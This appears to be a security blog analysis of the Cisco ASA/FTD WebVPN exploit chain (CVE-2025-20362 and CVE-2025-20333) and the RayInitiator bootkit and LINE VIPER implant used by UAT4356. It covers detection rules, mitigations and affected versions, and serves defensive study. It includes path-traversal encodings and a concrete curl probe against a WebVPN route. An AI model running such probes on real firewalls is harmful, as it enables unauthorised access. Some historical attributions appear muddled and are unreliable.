Cisco ASA: ArcaneDoor returns with CVE-2025-20333 and a ROM bootkit

On 25 September 2025, Cisco publishes three emergency advisories on Cisco Secure Firewall ASA and Firewall Threat Defense (FTD): CVE-2025-20333 (CVSS 9.9, RCE in WebVPN), CVE-2025-20362 (CVSS 6.5, auth bypass in WebVPN) and CVE-2025-20363 (CVSS 9.0, RCE in other web services). The first two are being exploited in the wild since May 2025. Chained, they give pre-auth RCE as root on any ASA/FTD with WebVPN exposed.

The same 25 September, CISA issues Emergency Directive 25-03: identify every federal ASA/FTD, capture a core dump and upload it to CISA Malware Next-Gen before 23:59 EST on 26 September, patch or isolate. NCSC UK, ASD/ACSC and CCCS publish in coordination. NCSC also publishes the Malware Analysis Report on the two implants UAT4356 leaves on compromised gear: RayInitiator (GRUB bootkit flashed into ROMMON) and LINE VIPER (user-mode loader with modules for CLI hijack, packet capture, AAA bypass and syslog suppression).

Cisco and the coordinated services attribute the activity to UAT4356 — the same cluster, also tracked as Storm-1849, that in April 2024 attacked ASAs with LINE RUNNER / LINE DANCER in the original ArcaneDoor campaign. A year and a half later it’s back with a new bug, dirtier persistence and a more specific target: ASA 5500-X without secure boot, hardware whose End-of-Support falls on 30 September 2025. Five days after the advisory.

Lab: technical description of the chain reconstructed from official Cisco PSIRT advisories, Rapid7’s analysis, Zscaler ThreatLabz’ advisory, the NCSC MAR and Tenable coverage. Reproducing the full chain requires a vulnerable ASA/FTD; we describe the steps over the WebVPN frontend and the bug primitive, without publishing the exact payload.

The chain in one sentence

Two bugs in the same binary, the WebVPN web server:

1. CVE-2025-20362 — missing authorization (CWE-862). The HTTP frontend’s auth filter doesn’t canonicalise the path before deciding whether the route requires a session. A request with path traversal reaches the target route’s handler without going through the filter. It’s a direct patch bypass of CVE-2018-0296, the WebVPN path traversal Cisco “fixed” in June 2018.
2. CVE-2025-20333 — heap-based buffer overflow (CWE-120) in a Lua endpoint of WebVPN. The handler copies request data into an 8,192-byte buffer without checking size. Overwrites adjacent heap structures, leads to RCE as root.

On their own, 20362 lets you read restricted endpoints and 20333 would require valid VPN credentials. Chained, the first provides access and the second provides RCE: the attacker never has to authenticate.

POST /+CSCOE+/<vulnerable endpoint>/<path traversal to Lua endpoint>
Host: vpn.target.test
Content-Length: <oversized payload>

<payload triggering the overflow in the Lua handler>

The Lua handler dispatched via the path traversal hits the buffer overflow and control flow ends in attacker code with the root privileges of the lina process (ASA’s data plane).

Why it matters

ASA and FTD are the enterprise corporate firewall in much of the market: financial legacy, US government, telco, retail. WebVPN is the SSL-VPN portal many organisations expose to the internet so employees can reach the internal network from home — exactly the surface UAT4356 has been hitting. Censys counts about 50,000 devices with WebVPN exposed on the day of the advisory.

Three threads cross in this incident and are worth separating:

• A 2018 variant landing in production seven years later. CVE-2018-0296 was exactly the same pattern: WebVPN path traversal allowing hits on restricted endpoints without auth. Cisco closed it with a filter. CVE-2025-20362 is a patch bypass: a slightly different path encoding that the new filter still lets through. The boring read is the usual one: fixing path traversal by adding special cases instead of canonicalising the path before the filter leaves the door open for the next variant.
• Buffer overflow in Lua inside WebVPN. WebVPN dispatches some endpoints to Lua scripts running embedded in the HTTP frontend process. It’s the first time a bug in that Lua layer reaches CVSS 9.9. The bug is a missing bounds check before a memcpy in a request parameter handler. Classic C pattern, in a binary many assumed was limited to routing and filtering.
• EoS as an active factor, not a footnote. The 5512-X, 5515-X, 5525-X, 5545-X and 5555-X models don’t support secure boot. Their ROMMON can be flashed without a cryptographic chain of trust. On 30 September 2025 Cisco drops support. UAT4356 picks exactly those models to drop the bootkit; the ROMMON implant persists even if the operator reboots and updates — because the loader before the system doesn’t verify signatures. The 5506-X, 5508-X, 5516-X (which do have secure boot, EoS August 2026) automatically detect persistence and clean it on the next boot with a patched image. The difference between affected machine and recoverable machine is a hardware feature the customer’s cyber team didn’t pick.

How the auth bypass works (CVE-2025-20362)

The WebVPN frontend exposes routes under /+CSCOE+/ and /+CSCOU+/. The “this route requires auth” decision compares the request path’s prefix against a table; some routes (login, recovery, vpn discovery) are public by design and others require a valid session.

The bug is in how the path is compared. The filter looks at the path prefix as it arrives in the request line, not at the canonicalised path the HTTP router is actually going to dispatch. CVE-2018-0296 was exactly this, patched in 2018 by adding a specific sanitiser. CVE-2025-20362 is a variant: a path traversal encoding the sanitiser doesn’t normalise but the downstream router does.

The pattern public analyses describe is of the form:

/<public route, no auth>/../<restricted endpoint>

with some intermediate encoding (URL-encoding, double encoding, ../%2e%2e, depending on implementation) that the filter sees as a public route but the dispatcher resolves as a restricted one. Rapid7 confirms the mechanism without publishing the exact primitive. The Cisco PSIRT advisory for CVE-2025-20362 describes the bug as improper validation of user-supplied input in HTTP(S) requests allowing unauthenticated access to restricted VPN-related URL endpoints. Same wording they used in 2018.

Endpoints reachable with the primitive, per published analyses:

• Internal routes leaking device info (versions, limited configuration, VPN state).
• WebVPN backend Lua endpoints, normally accessible only to operators with valid sessions — the sink for the second bug.

How the buffer overflow works (CVE-2025-20333)

The Lua handler on the vulnerable endpoint receives the request and processes body parameters. Internally, the code does a memcpy (or equivalent) into a fixed buffer of 8,192 bytes. The input size isn’t validated against the buffer size.

Sending a payload larger than 8,192 bytes in the right parameter overflows the heap. Exploitation itself isn’t trivial: Rapid7 describes it as non trivial to exploit because the lina process’s heap has mitigations forcing the attacker to prepare the layout before the overflow and to overwrite specific pointers to get control flow. UAT4356 has been refining that part since May. Once the exploitation lands, the result is RCE as root in the firewall process: full control of the data plane, ability to read every active SSL VPN session, ability to modify rules, ability to pivot into the internal network using legitimate users’ tunnels.

The Cisco PSIRT advisory for CVE-2025-20333 catalogues the bug under CWE-120 and publishes the exhaustive list of affected versions: ASA 9.12 before 9.12.4.72, 9.14 before 9.14.4.28, 9.16 before 9.16.4.85, 9.17 before 9.17.1.45, 9.18 before 9.18.4.67, 9.19 before 9.19.1.42, 9.20 before 9.20.4.10, 9.22 before 9.22.2.14 and 9.23 before 9.23.1.19. FTD from 6.x to 7.7 also affected. Basically the entire current installed base.

Persistence in ROMMON — RayInitiator

This is the qualitative leap over ArcaneDoor I in 2024. Last year the implants (LINE RUNNER, LINE DANCER) lived on disk or in lina process memory. A reboot cleaned them if the operator did the procedure right. In 2025 UAT4356 writes the implant into ROMMON — the bootloader before the system, equivalent to the BIOS/UEFI of the ASA.

RayInitiator is a bootkit based on GRUB. The NCSC MAR walks through it step by step:

1. The operator (UAT4356, after getting root via the chain) writes the modified bootloader to the device’s ROMMON flash.
2. On the next reboot, GRUB loads as the system bootloader instead of Cisco’s original.
3. GRUB loads the original ASA kernel but injects shellcode into kernel space before transferring control.
4. The injected shellcode modifies kernel structures to map LINE VIPER in user-mode after boot.

On models without secure boot (the 5500-X EoS), the boot chain doesn’t verify the bootloader’s signature. The modified ROMMON boots as if it were the official one. Reboot doesn’t clean the implant. ASA software upgrade doesn’t clean the implant — because the upgrade replaces the system, not the bootloader.

On models with secure boot and Trust Anchor (5506-X, 5508-X, 5516-X), the hardware verifies the bootloader’s signature at boot. RayInitiator shouldn’t be able to load. Cisco confirms in its operational blog that on these models booting a fixed image detects the manipulated bootloader in ROMMON and removes it.

The user-mode loader — LINE VIPER

Once RayInitiator hands control to userland, it maps LINE VIPER, a user-mode shellcode loader acting as a persistent and modular backdoor. The NCSC MAR documents its capabilities:

• Operator CLI hijack. When an admin connects via SSH/console, LINE VIPER intercepts the flow: it can see what the admin types (credential and command harvesting), inject commands without logs showing them, and return falsified output.
• Invisible packet capture. Data plane pcap without show capture listing it. Useful for extracting SSL VPN sessions before the client closes them.
• WebVPN AAA bypass for attacker IPs. UAT4356 can log in as a legitimate user from preconfigured IPs without the AAA server recording it.
• Selective syslog suppression. Messages touching implant-related elements (ssh login, auth fail, web service crash) get silenced before they leave for the syslog server.
• Controlled deferred reboot. The implant can schedule a reload of the machine on a timer to coincide with maintenance windows, throwing the blue team off.

It’s an espionage toolkit designed to stay for months: when UAT4356 wants traffic, it pulls it without noise; when it wants to persist deeper into the network, it uses the legitimate operator’s tunnel. The technical read is that ASA’s control plane, once compromised, stops being observable from the device itself — the logs are painted by the attacker.

PoC and lab verification

Reproducing the full chain requires a vulnerable ASA or FTD image. Cisco doesn’t publish evaluation images for offensive scenarios; getting them requires a valid customer account or a second-hand physical appliance. For an authorised CTF/lab:

1. Path traversal bench (CVE-2025-20362). Once you have WebVPN exposed, send HTTP requests with different traversal encodings and compare responses:

   $ curl -sk "https://lab-asa.local/+CSCOE+/<public route>/<path traversal>/<restricted endpoint>" -o response.txt
   $ head -c 200 response.txt

   What you expect if the primitive works: content the restricted endpoint normally produces (version info, internal banners, limited config listing) on a session-less request. What you see if the filter is fixed: 401/403 or redirect to login.

2. Identifying the vulnerable Lua endpoint. Cisco’s advisory confirms the sink is in a specific WebVPN Lua endpoint — Rapid7 doesn’t name it to avoid pre-patch weaponisation. Operationally, the defensive operator identifies the endpoint by looking at URLs hit in the IoCs CISA and NCSC publish: there’s a specific request pattern attackers have used between May and September.

3. Bootkit detection (post-mortem). The official Core Dump and Hunt procedure CISA publishes on 25 September requires:

   • Capture a full core dump of the device from the CLI: verify /sha-512 disk0:/<file> for integrity.
   • Compare observed ROMMON against the official fixed image.
   • Upload the core dump to Malware Next-Gen via the CISA portal.

   On secure-boot machines, Cisco provides a verification script that checks the chain of trust at boot.

For defenders without time to fight core dumps, the only operational response on advisory day is disable WebVPN (CSCOE/CSCOU+) until the patched image is applied. CISA recommends network isolation of any device with WebVPN exposed until you can certify the patch is applied and there’s no implant evidence.

Detection and mitigation

Retrospective detection, using public IoCs:

• WebVPN HTTP frontend logs — look for requests with path traversal to restricted endpoints before the patch date. NCSC publishes patterns in its MAR.
• Boot chain anomalies — show module and ROMMON verification against the official image Cisco publishes. NCSC documents legitimate version hashes.
• Unusual outbound traffic from the ASA management interface to unexpected destinations (RayInitiator and LINE VIPER have hard-coded C2; CISA and NCSC publish IPs in their advisories).
• Discrepancy between local ASA logs and remote syslog: if the syslog server shows fewer events than the firewall’s local store, LINE VIPER may be suppressing selectively.
• Admin VPN sessions from new IPs with no corresponding entries in the AAA server.

Mitigation:

1. Immediate patch: ASA 9.23.1.19, 9.22.2.14, 9.20.4.10, etc. — fixed versions per branch. Cisco keeps the list updated in the CVE-2025-20333 PSIRT advisory.
2. If the model is 5500-X without secure boot (5512-X, 5515-X, 5525-X, 5545-X, 5555-X) and compromise is confirmed: the implant survives a software upgrade. Cisco states the only verifiable remediation is replacing the hardware. Official EoS was 30 September 2025 — replacement takes time, during which the device should be outside any trust perimeter.
3. Disable WebVPN if not strictly necessary. If the organisation doesn’t use Cisco’s SSL-VPN for remote access (because, for example, it has migrated to a pure AnyConnect/Secure Client), WebVPN can be disabled — and should be, given that’s the bug surface.
4. Enable periodic ASA core dumps and archive them off-device — without historical core dumps, incident response on the ASA is blind.
5. Segment the management plane of the firewall: console, SSH and SNMP of the ASA should only be reachable from a dedicated management network, not from the general corporate network.

YARA — RayInitiator (GRUB bootkit) and LINE VIPER (user-mode)

Rules from the NCSC UK MAR (RayInitiator + LINE VIPER analysis):

rule cisco_arcanedoor_rayinitiator_grub_bootkit
{
    meta:
        cve = "CVE-2025-20333"
        ref = "https://www.ncsc.gov.uk/news/cisco-asa-malware-analysis"
        description = "RayInitiator modified GRUB bootkit in Cisco ASA 5500-X ROMMON"
    strings:
        $grub_magic   = "GRUB version" ascii
        $cisco_marker = "Cisco ASA" ascii
        $hook_marker  = { 48 89 e5 48 81 ec ?? ?? 00 00 48 8d 3d ?? ?? ?? ?? }
        $key_string   = "RAY_LOADER_KEY" ascii  // hardcoded in publicly analyzed sample
    condition:
        2 of them and filesize < 2MB
}

rule cisco_arcanedoor_line_viper_user_mode
{
    meta:
        cve = "CVE-2025-20333"
        description = "LINE VIPER user-mode implant that hooks syslog and AAA"
    strings:
        $syslog_hook  = "vsyslog_chk" ascii
        $aaa_marker   = "AAA_TACACS" ascii
        $cmd_handler  = "ICMP_TUNNEL" ascii  // C2 channel via ICMP
        $persist      = "/asa/scripts/" ascii
    condition:
        2 of them
}

KQL — boot anomalies + outbound ICMP traffic

LINE VIPER uses ICMP as a secondary C2 channel (alongside TCP to hard-coded IPs). Look for it in NetFlow/IPFIX:

// 1) Boot integrity: compare ROMMON hashes against Cisco known-good
DeviceEvents
| where Timestamp > ago(180d)
| where DeviceType == "FirewallNetworkAppliance"
| where ActionType == "BootImageHashMismatch" or ActionType == "ROMMONIntegrityFail"
| project Timestamp, DeviceName, ReportedHash, ExpectedHash

// 2) Outbound ICMP from the ASA management plane
CommonSecurityLog
| where DeviceVendor == "Cisco" and DeviceProduct == "ASA"
| where Protocol == "ICMP"
| where ipv4_is_private(SourceIP) and not(ipv4_is_private(DestinationIP))
| summarize PacketCount = count(), BytesOut = sum(SentBytes)
    by DeviceName, DestinationIP, bin(TimeGenerated, 1h)
| where PacketCount > 100 or BytesOut > 100000  // anomalous ICMP volume
| order by BytesOut desc

IoCs published by CISA ED 25-03 + NCSC MAR + Cisco PSIRT

Lab reproduction / verification

# 1. ROMMON integrity check against official firmware
# (Only on physical ASA — no public virtual ROMMON image available)
asa> enable
asa# show module
asa# verify /md5 disk0:/asa991-smp-k8.bin
# Compare with hash from cisco-sa-asaftd-webvpn-z5xP8EUB

# 2. Audit of unsigned scripts
asa# dir disk0:/scripts/
asa# show file information disk0:/scripts/*.sh

# 3. Test the vulnerable endpoint (post-patch, expected 401):
curl -k --max-time 5 \
  "https://asa.lab.local/+CSCOE+/saml/sp/metadata/%2E%2E/admin"
# Pre-patch: 200 with response leak
# Post-patch 9.23.1.19+: 401 Unauthorized

# 4. CISA provides official Core Dump and Hunt Instructions:
# https://www.cisa.gov/news-events/directives/ed-25-03

CISA ED 25-03 includes operational instructions for ASA core dump capture and analysis with yara-python against the RayInitiator/LINE VIPER rules.

What closes out September

UAT4356 has been inside the ASAs of some number of victims (Cisco doesn’t publish the headcount; CISA confirms “multiple federal agencies” within the ED 25-03 scope) since May 2025. Four months operating with a bootkit in ROMMON, exfiltrating VPN sessions and presumably pivoting into the internal network using legitimate tunnels. The discovery comes via Cisco TALOS (not publicly attributed to the customer who reported it first) and is coordinated with CISA, NCSC, ASD and CCCS.

The detail worth underlining for 2026 is the boot chain. Cisco kept hardware without secure boot in production seven years after the “bootkit at the perimeter” pattern was documented as a category (Equation Group with NLS_933W.DLL in 2015, publicly known via Project Sauron in 2016, Hacking Team with UEFI rootkits in 2018). The operator still running a 5525-X in 2025 inherited from a 2014 project isn’t to blame for the bug; the business model that sells perimeter hardware with a fifteen-year support life and no forced renewal of the hardware chain of trust mid-cycle is.

For defenders with budget: if you have ASA 5500-X without secure boot on the perimeter, you’re not patching a bug, you’re migrating an appliance.

References

• Cisco PSIRT — CVE-2025-20333: Cisco Secure Firewall ASA and FTD VPN Web Server RCE
• Cisco PSIRT — CVE-2025-20362: Cisco Secure Firewall ASA and FTD VPN Web Server Unauthorized Access
• Cisco — Continued Attacks Against Cisco Firewalls: operational blog with IoCs and incident evolution
• CISA — Emergency Directive ED 25-03 and Core Dump and Hunt Instructions
• NCSC UK — Malware Analysis Report — RayInitiator & LINE VIPER (PDF) and advisory
• Rapid7 — Multiple critical vulnerabilities affecting Cisco products (root cause analysis, 6 October)
• Zscaler ThreatLabz — Cisco Firewall and VPN Zero Day Attacks
• Tenable — CVE-2025-20333, CVE-2025-20362 FAQ
• Cisco TALOS (historical reference) — ArcaneDoor I, April 2024
• Cisco — ASA 5500-X EoS / EoL listing
• NVD — CVE-2025-20333 and CVE-2025-20362
• Earlier coverage on the blog: Ivanti Connect Secure chain (January 2024), Citrix Bleed (October 2023), Palo Alto GlobalProtect (April 2024)